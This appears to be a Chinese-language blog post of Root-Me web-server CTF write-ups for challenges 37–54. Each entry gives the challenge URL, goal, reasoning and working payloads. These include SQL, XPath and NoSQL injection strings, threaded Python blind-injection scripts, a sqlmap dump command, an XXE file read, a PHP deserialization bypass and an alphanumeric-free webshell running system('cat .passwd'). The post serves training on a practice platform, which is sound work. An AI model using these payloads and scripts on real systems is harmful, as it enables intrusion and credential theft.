././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././</div></pre></td></tr></table></php5.3版本的情况下，有一个本地文件包含的路径截断漏洞，></p>
<h1 id="37-PHP-Serialization"><a href="#37-PHP-Serialization" class="headerlink" title="37.PHP Serialization"></a>37.PHP Serialization</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch28/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch28/</a><br>[+]Statement:获取管理员的访问权限<br>[+]Solution:可以看到源码，分析源码逻辑。最终目的是要使$_SESSION[‘login’]=admin。其中关键变量$data有两种赋值方式，一种是通过传入的POST参数赋值，另一种是从cookie里的autologin的值反序列化得到。下面的验证逻辑是比较$data[‘password’]==$auth[$data[‘login’]],后者的值应该为一个字符串，而这里可以里用==的弱类型比较，使$data[‘password’]的值为true，即可绕过比较。因此构造php页面如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">$data[&apos;login&apos;]=&apos;superadmin&apos;;</div><div class="line">$data[&apos;password&apos;]=true;</div><div class="line">echo(urlencode(serialize($data)));</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>构造Cookie如下，并且去掉POST的两个参数，即可绕过。<br>[+]Payload:Cookie:autologin=a%3A2%3A%7Bs%3A5%3A%22login%22%3Bs%3A10%3A%22superadmin%22%3Bs%3A8%3A%22password%22%3Bb%3A1%3B%7D</p>
<h1 id="38-SQL-injection-numeric"><a href="#38-SQL-injection-numeric" class="headerlink" title="38.SQL injection - numeric"></a>38.SQL injection - numeric</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch18/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch18/</a><br>[+]Statement:获取管理员的密码<br>[+]Solution:当输入1‘时，发现会报错，提示存在\，判断应该是加了waf过滤。根据题目提示，为数字型注入，因此不使用单双引号进行注入。<br>[+]Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">action=news&amp;news_id=4%20union%20select%201,name,sql%20from%20sqlite_master</div><div class="line">action=news&amp;news_id=4%20union%20select%201,username,password%20from%20users</div></pre></td></tr></table></figure></p>
<h1 id="39-SQL-Injection-Routed"><a href="#39-SQL-Injection-Routed" class="headerlink" title="39.SQL Injection - Routed"></a>39.SQL Injection - Routed</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch49/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch49/</a><br>[+]Statement:找到管理员的密码<br>[+]Solution:题目的意思为路由注入，也就跟二次注入差不多，查看页面逻辑，第一个页面怎么登录都显示账户或密码错误，第二个页面发现可以注入，当输入’union select 1时，页面的第二行数据显示为1，根据提示，再在联合查询后跟一个子联合查询，并且使用16进制表示以绕过waf。由于直接查询读数我这里老出语法错误，因此我使用基于报错的查询方式构造Payload，一步步读出密码<br>[+]Payload:（需要16进制编码）<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&apos;union select concat(0x7e,database(),0x7e),0 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&quot;c_webserveur_49&quot; ),0x7e),1)&apos;--+</div><div class="line">&apos;union select concat(0x7e,database(),0x7e),0 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&quot;users&quot; ),0x7e),1)&apos;--+</div><div class="line">&apos;union select concat(0x7e,database(),0x7e),0 or updatexml(1,concat(0x7e,(select concat_ws(&apos;:&apos;,login,password) from users limit 1),0x7e),1)&apos;--+</div></pre></td></tr></table></figure></p>
<h1 id="40-PHP-Eval"><a href="#40-PHP-Eval" class="headerlink" title="40.PHP - Eval"></a>40.PHP - Eval</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch57/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch57/</a><br>[+]Statement:找到这个服务器的漏洞并利用。flag在.passwd文件中。<br>[+]Solution:题目给出了源码，大致意思是需要构造一个没有字母和反斜杠的webshell，之前看<a href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html" target="_blank" rel="external">P总的文章</a>里有详细介绍无字母数字的webshell构造方法，利用位运算里的取反操作符～可以把汉字里某些字符变成字母，利用这个特性，构造出Payload，可构造出webshell。<br>[+]Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">input=$__=(&apos;&gt;&apos;&gt;&apos;&lt;&apos;)+(&apos;&gt;&apos;&gt;&apos;&lt;&apos;);$_=$__/$__;$____=&apos;&apos;;$___=&quot;瞰&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;和&quot;;$____.=~($___&#123;$__&#125;);$___=&quot;和&quot;;$____.=~($___&#123;$__&#125;);$___=&quot;的&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;半&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;始&quot;;$____.=~($___&#123;$__&#125;);$_____=&apos;_&apos;;$___=&quot;俯&quot;;$_____.=~($___&#123;$__&#125;);$___=&quot;瞰&quot;;$_____.=~($___&#123;$__&#125;);$___=&quot;次&quot;;$_____.=~($___&#123;$_&#125;);$___=&quot;站&quot;;$_____.=~($___&#123;$_&#125;);$_=$$_____;$____($_[$__]);&amp;2=system(&apos;cat .passwd&apos;)</div></pre></td></tr></table></figure></p>
<h1 id="41-XML-External-Entity"><a href="#41-XML-External-Entity" class="headerlink" title="41.XML External Entity"></a>41.XML External Entity</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch29/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch29/</a><br>[+]Statement:获取管理员的密码<br>[+]Solution:题目考察XXE(外部实体注入)，打开页面是一个在线检测网页是不是合法的RSS格式的页面，可以输入文件的地址。于是在vps上创建一个xsl文件，在里面加入xxePayload，并加上合法的RSS文件格式，在W3CSchool可以找到。输入网址，可以实现文件读取。<br>[+]Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; ?&gt;</div><div class="line">&lt;!DOCTYPE r [</div><div class="line">&lt;!ELEMENT r ANY &gt;</div><div class="line">&lt;!ENTITY sp SYSTEM &quot;php://filter/read=convert.base64-encode/resource=index.php&quot;&gt;</div><div class="line">]&gt;</div><div class="line">&lt;rss version=&quot;2.0&quot;&gt;</div><div class="line"></div><div class="line">&lt;channel&gt;</div><div class="line">  &lt;title&gt;&amp;sp;&lt;/title&gt;</div><div class="line">  &lt;link&gt;https://www.w3schools.com&lt;/link&gt;</div><div class="line">  &lt;description&gt;Free web building tutorials&lt;/description&gt;</div><div class="line">  &lt;item&gt;</div><div class="line">    &lt;title&gt;&amp;sp;&lt;/title&gt;</div><div class="line">    &lt;link&gt;https://www.w3schools.com/xml/xml_rss.asp&lt;/link&gt;</div><div class="line">    &lt;description&gt;New RSS tutorial on W3Schools&lt;/description&gt;</div><div class="line">  &lt;/item&gt;</div><div class="line">  &lt;item&gt;</div><div class="line">    &lt;title&gt;XML Tutorial&lt;/title&gt;</div><div class="line">    &lt;link&gt;https://www.w3schools.com/xml&lt;/link&gt;</div><div class="line">    &lt;description&gt;New XML tutorial on W3Schools&lt;/description&gt;</div><div class="line">  &lt;/item&gt;</div><div class="line">&lt;/channel&gt;</div><div class="line"></div><div class="line">&lt;/rss&gt;</div></pre></td></tr></table></figure></p>
<h1 id="42-SQL-Truncation"><a href="#42-SQL-Truncation" class="headerlink" title="42.SQL Truncation"></a>42.SQL Truncation</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch36/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch36/</a><br>[+]Statement:找到进入管理员空间的方法<br>[+]Solution:利用sql截断的特性。在页面的源码里给出了创建表的sql语句。可以看到用户名只有12位，当我们注册如下账户admin                           a时，mysql会默认截断12位后的a，当服务器的配置不当时，我们此时就已经修改了admin的密码。</p>
<h1 id="43-XPath-injection-authentication"><a href="#43-XPath-injection-authentication" class="headerlink" title="43.XPath injection - authentication"></a>43.XPath injection - authentication</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch23/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch23/</a><br>[+]Statement:找到管理员的密码<br>[+]Solution:Xpath类型的认证注入，构造永真式，同时根据member页面显示的管理员的用户名，构造payload，获取管理员权限<br>[+]Payload:username=John or  ‘1’=’1&amp;password=123</p>
<h1 id="44-Local-File-Inclusion-Wrappers"><a href="#44-Local-File-Inclusion-Wrappers" class="headerlink" title="44.Local File Inclusion - Wrappers"></a>44.Local File Inclusion - Wrappers</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch43/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch43/</a><br>[+]Statement:找到flag<br>[+]Solution:这是一个结合文件上传、文件包含和伪协议的题。通过使用<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-zip" target="_blank" rel="external">github上的zip文件上传payload</a>，绕过图片类型检测，并通过执行代码里的show_source(‘index.php’)，查看到源码。但发现服务器禁止了外部命令执行的函数。通过列目录，发现flag文件，再用show_source查看flag文件。<br>[+]Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div></pre></td><td class="code"><pre><div class="line">echo &apos;&lt;pre&gt;&lt;?php</div><div class="line">function get_allfiles($path,&amp;$files)</div><div class="line">&#123;</div><div class="line">    if(is_dir($path))</div><div class="line">    &#123;</div><div class="line">        $dp = dir($path);</div><div class="line">        while ($file = $dp -&gt;read())</div><div class="line">        &#123;</div><div class="line">            if($file !== &quot;.&quot; &amp;&amp; $file !== &quot;..&quot;)</div><div class="line">            &#123;</div><div class="line">                get_allfiles($path.&quot;/&quot;.$file, $files);</div><div class="line">            &#125;</div><div class="line">        &#125;</div><div class="line">        $dp -&gt;close();</div><div class="line">    &#125;</div><div class="line">    if(is_file($path))</div><div class="line">    &#123;</div><div class="line">        $files[] =  $path;</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">function get_filenamesbydir($dir)</div><div class="line">&#123;</div><div class="line">    $files =  array();</div><div class="line">    get_allfiles($dir,$files);</div><div class="line">    return $files;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$filenames = get_filenamesbydir(&quot;./&quot;);</div><div class="line">//打印所有文件名，包括路径</div><div class="line">foreach ($filenames as $value)</div><div class="line">&#123;</div><div class="line">    echo $value, PHP_EOL;</div><div class="line">&#125;</div><div class="line"></div><div class="line">?&gt;&lt;/pre&gt;</div><div class="line">&apos; &gt; a.php;</div><div class="line">zip payload.zip a.php;</div><div class="line">mv payload.zip payload.jpg;</div><div class="line"></div><div class="line">http://challenge01.root-me.org/web-serveur/ch43/index.php?page=zip://tmp/upload/3rqsJvyOk.jpg%23a</div></pre></td></tr></table></figure></p>
<h1 id="45-SQL-injection-Error"><a href="#45-SQL-injection-Error" class="headerlink" title="45.SQL injection - Error"></a>45.SQL injection - Error</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch34/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch34/</a><br>[+]Statement:找到管理员的密码<br>[+]Solution:页面的第一个页面无法注入。但第二个页面的order参数可以注入。利用sqlmap可以注入出数据。<br>[+]Payload:action=contents&amp;order=ASC,(SELECT (CASE WHEN (8970=8970) THEN 1 ELSE 1/(SELECT 0) END))</p>
<h1 id="46-SQL-injection-Insert"><a href="#46-SQL-injection-Insert" class="headerlink" title="46.SQL injection - Insert"></a>46.SQL injection - Insert</h1><h1 id="47-XSLT-Code-execution"><a href="#47-XSLT-Code-execution" class="headerlink" title="47.XSLT - Code execution"></a>47.XSLT - Code execution</h1><h1 id="48-Java-Spring-Boot"><a href="#48-Java-Spring-Boot" class="headerlink" title="48.Java - Spring Boot"></a>48.Java - Spring Boot</h1><h1 id="49-SQL-injection-file-reading"><a href="#49-SQL-injection-file-reading" class="headerlink" title="49.SQL injection - file reading"></a>49.SQL injection - file reading</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch31/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch31/</a><br>[+]Statement:找到管理员的密码<br>[+]Solution:member页面的id参数可以注入，使用union select可以读到表里的member密码。但是并不是正确的密码。按照题目要求，需要读文件。使用load_file()函数读取，猜测文件路径，最后确定为/challenge/web-serveur/ch31/index.php，这里因为单双引号被过滤了，所以使用16进制表示。然后可以读到index.php源码。源码里给出了从数据库里的密码到和输入比较的字符串的解密函数，在本地利用这个函数计算出真实密码值，另外注意到源码里是输入的sha1值等于这个值，所以在在线的sha1解密网站解密这个值，得到最终的密码<br>[+]Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=-1 union select load_file(0x2f6368616c6c656e67652f7765622d736572766575722f636833312f696e6465782e706870),2,3,4-- +</div></pre></td></tr></table></figure></p>
<h1 id="50-XPath-injection-string"><a href="#50-XPath-injection-string" class="headerlink" title="50.XPath injection - string"></a>50.XPath injection - string</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch27/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch27/</a><br>[+]Statement:获取管理员密码<br>[+]Solution:在member页面可以注入，并且测试发现会出现输入语句的报错，构造payload可以读到用户名和密码。一对一对测试可以找到管理员账号。<br>[+]Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">&apos;) or (&apos;1&apos;=&apos;1</div><div class="line">1&apos; or &apos;1&apos;=&apos;1&apos;)]|//user/password[contains(.,&apos;</div></pre></td></tr></table></figure></p>
<h1 id="51-NoSQL-injection-blind"><a href="#51-NoSQL-injection-blind" class="headerlink" title="51.NoSQL injection - blind"></a>51.NoSQL injection - blind</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch48/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch48/</a><br>[+]Statement:这是一个web应用，找到nosqlblind的flag<br>[+]Solution:在name输入nosqlblind，利用基于布尔类型的注入，使用regex一位一位的进行注入，最终可以得到flag。<br>[+]Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div></pre></td><td class="code"><pre><div class="line"> import requests,threading,queue,time,string</div><div class="line"></div><div class="line">SHARE_Q=queue.Queue()</div><div class="line">payload=&quot;&quot;</div><div class="line">next=False</div><div class="line">class worker(threading.Thread):</div><div class="line">	def __init__(self,func):</div><div class="line">		threading.Thread.__init__(self)</div><div class="line">		self.func=func</div><div class="line">	def run(self):</div><div class="line">		self.func()</div><div class="line"></div><div class="line"></div><div class="line">def scan():</div><div class="line">	global SHARE_Q</div><div class="line">	global payload</div><div class="line">	global next</div><div class="line">	if next==True:</div><div class="line">		next=False</div><div class="line">		return</div><div class="line">	url=&quot;http://challenge01.root-me.org/web-serveur/ch48/index.php?chall_name=nosqlblind&amp;flag[$regex]=^(&#123;&#125;)&quot;</div><div class="line"></div><div class="line">	while not SHARE_Q.empty():</div><div class="line">		i=SHARE_Q.get(timeout=1)</div><div class="line">		print(&apos;[url]:&apos;+payload+i)</div><div class="line">		r=requests.get(url.format(payload+i))</div><div class="line">		if &apos;Yeah&apos; in r.text:</div><div class="line">			payload+=i</div><div class="line">			print(&apos;[payload]:&apos;+payload)</div><div class="line">			SHARE_Q.queue.clear()</div><div class="line">			next=True</div><div class="line">			SHARE_Q.task_done()</div><div class="line">			return</div><div class="line">	SHARE_Q.task_done()</div><div class="line">def main():</div><div class="line">	global SHARE_Q</div><div class="line">	threads=[]</div><div class="line"></div><div class="line">	while True:</div><div class="line">		for i in string.printable[:-6]:</div><div class="line">			if i in &apos;*.?+$^[]()&#123;&#125;|\\/&apos;:</div><div class="line">				SHARE_Q.put(&apos;\\&apos;+i)</div><div class="line">			else:</div><div class="line">				SHARE_Q.put(i)</div><div class="line">		for i in range(10):</div><div class="line">			thread=worker(scan)</div><div class="line">			thread.start()</div><div class="line">			threads.append(thread)</div><div class="line">		for thread in threads:</div><div class="line">			thread.join()</div><div class="line">		SHARE_Q.join()</div><div class="line">if __name__ == &apos;__main__&apos;:</div><div class="line">	main()</div></pre></td></tr></table></figure></p>
<h1 id="52-SQL-injection-Time-based"><a href="#52-SQL-injection-Time-based" class="headerlink" title="52.SQL injection - Time based"></a>52.SQL injection - Time based</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch40/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch40/</a><br>[+]Statement:获取管理员密码<br>[+]Solution:在member页面可以注入，根据提示只能时间注入，放在sqlmap里跑即可。<br>[+]Payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">python sqlmap.py -u &quot;http://challenge01.root-me.org/web-serveur/ch40/?action=member&amp;member=1&quot; -v3 -D public -T users --dump</div></pre></td></tr></table></figure></p>
<h1 id="53-SQL-injection-blind"><a href="#53-SQL-injection-blind" class="headerlink" title="53.SQL injection - blind"></a>53.SQL injection - blind</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch10/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch10/</a><br>[+]Statement:获得管理员密码<br>[+]Solution:这个页面注册时可以注入登录，因此可以利用基于boolen的注入一步步猜解出数据库信息<br>[+]Payload:盲注脚本如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div></pre></td><td class="code"><pre><div class="line">import requests,string,threading,queue,time</div><div class="line">url=&quot;http://challenge01.root-me.org/web-serveur/ch10/&quot;</div><div class="line">username=&apos;&apos;</div><div class="line">password=&apos;&apos;</div><div class="line">payload=&apos;&apos;</div><div class="line">next=False</div><div class="line"></div><div class="line"></div><div class="line">class myThread(threading.Thread):</div><div class="line">    &quot;&quot;&quot;docstring for myThread&quot;&quot;&quot;</div><div class="line">    def __init__(self, func,queue):</div><div class="line">        super(myThread, self).__init__()</div><div class="line">        self.func=func</div><div class="line">        self.queue=queue</div><div class="line">    def run(self):</div><div class="line">        while True:</div><div class="line">            data=self.queue.get()</div><div class="line">            self.func(data)</div><div class="line">            self.queue.task_done()</div><div class="line"></div><div class="line">def work(data):</div><div class="line">    i,j,k=data</div><div class="line">    global next,payload</div><div class="line">    #username=&quot;1&apos; or substr((select sql FROM sqlite_master where type=&apos;table&apos;),&#123;&#125;,1)=&apos;&#123;&#125;&apos; --+&quot;.format(j,i)</div><div class="line">    username=&quot;1&apos; or substr((select username||&apos;:&apos;||password FROM  users limit &#123;&#125;,1),&#123;&#125;,1)=&apos;&#123;&#125;&apos; --+&quot;.format(k,j,i)</div><div class="line">    print(username)</div><div class="line">    data=&#123;&quot;username&quot;:username,&quot;password&quot;:&apos;1&apos;&#125;</div><div class="line">    </div><div class="line">    page = &apos;&apos;</div><div class="line">    while page == &apos;&apos;:</div><div class="line">        try:</div><div class="line">            page = requests.post(url,data=data)</div><div class="line">            break</div><div class="line">        except:</div><div class="line">            print(&quot;Connection refused by the server..&quot;)</div><div class="line">            print(&quot;Let me sleep for 5 seconds&quot;)</div><div class="line">            print(&quot;ZZzzzz...&quot;)</div><div class="line">            time.sleep(5)</div><div class="line">            print(&quot;Was a nice sleep, now let me continue...&quot;)</div><div class="line">            continue</div><div class="line">    </div><div class="line">    if &apos;Welcome&apos; in page.text:</div><div class="line">        payload+=i</div><div class="line">        print(payload)</div><div class="line">        next=True</div><div class="line"></div><div class="line">q=queue.Queue(5)</div><div class="line">for i in range(5):</div><div class="line">        thread=myThread(work,q)</div><div class="line">        thread.start()</div><div class="line">        #threads.append(thread)</div><div class="line"></div><div class="line">&apos;&apos;&apos;for j in range(1,100):</div><div class="line">    if next==True:</div><div class="line">        next=False</div><div class="line">    for i in string.printable[:-5]:</div><div class="line">        if next==False:</div><div class="line">            q.put([i,j])</div><div class="line">            #print(&quot;&#123;&#125; is put&quot;.format(j))</div><div class="line">        else:</div><div class="line">            next=False</div><div class="line">            break</div><div class="line">q.join()&apos;&apos;&apos;</div><div class="line">for k in range(1,5):</div><div class="line">    for j in range(1,100):</div><div class="line">        if next==True:</div><div class="line">            next=False</div><div class="line">        for i in string.printable[:-5]:</div><div class="line">            if next==False:</div><div class="line">                q.put([i,j,k])</div><div class="line">                #print(&quot;&#123;&#125; is put&quot;.format(j))</div><div class="line">            else:</div><div class="line">                next=False</div><div class="line">                break</div><div class="line">    q.jojn()</div></pre></td></tr></table></figure></p>
<h1 id="54-XPath-injection-blind"><a href="#54-XPath-injection-blind" class="headerlink" title="54.XPath injection - blind"></a>54.XPath injection - blind</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch24/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch24/</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/12/10/sqli-lab学习的一些思路/" rel="next" title="sqli-lab学习心得总结">
                <i class="fa fa-chevron-left"></i> sqli-lab学习心得总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.png"
                alt="LH" />
            
              <p class="site-author-name" itemprop="name">LH</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-HTML"><span class="nav-number">1.</span> <span class="nav-text">1.HTML</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-HTTP-Open-redirect"><span class="nav-number">2.</span> <span class="nav-text">2.HTTP - Open redirect</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-Command-injection"><span class="nav-number">3.</span> <span class="nav-text">3.Command injection</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-Weak-password"><span class="nav-number">4.</span> <span class="nav-text">4.Weak password</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-User-agent"><span class="nav-number">5.</span> <span class="nav-text">5.User-agent</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6-Backup-file"><span class="nav-number">6.</span> <span class="nav-text">6.Backup file</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#7-HTTP-POST"><span class="nav-number">7.</span> <span class="nav-text">7.HTTP - POST</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#8-HTTP-directory-indexing"><span class="nav-number">8.</span> <span class="nav-text">8.HTTP directory indexing</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#9-HTTP-Headers"><span class="nav-number">9.</span> <span class="nav-text">9.HTTP Headers</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#10-HTTP-verb-tampering"><span class="nav-number">10.</span> <span class="nav-text">10.HTTP verb tampering</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#11-Install-files"><span 